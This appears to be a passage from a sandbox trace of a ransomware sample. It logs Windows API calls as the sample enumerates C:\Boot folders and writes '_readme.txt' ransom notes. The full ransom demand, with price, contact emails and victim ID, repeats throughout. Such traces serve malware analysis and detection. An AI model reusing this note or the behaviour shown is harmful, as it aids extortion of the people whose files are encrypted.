you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0166.009] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0166.009] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.009] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0166.009] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: hHeap=0xcd0000) returned 1 [0166.009] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.009] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0166.009] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.009] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0166.010] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0166.010] PathFindExtensionW (pszPath="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned=".mui" [0166.010] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.010] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f60 | out: hHeap=0xcd0000) returned 1 [0166.010] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0166.010] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0166.010] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.010] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0166.010] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0166.010] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0166.010] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0166.010] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.010] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.020] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.020] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.020] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.020] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.020] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.020] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.020] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.020] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.020] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.020] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.020] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.021] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.021] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.022] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.022] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0166.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.023] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.023] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.024] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0166.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.024] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0166.024] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0166.024] PathFindFileNameW (pszPath="") returned="" [0166.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.024] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0166.024] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0166.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0166.024] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0166.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0166.024] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.024] FreeLibrary (hLibModule=0x759d0000) returned 1 [0166.025] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0166.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.025] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0166.025] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b47e70 [0166.025] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted 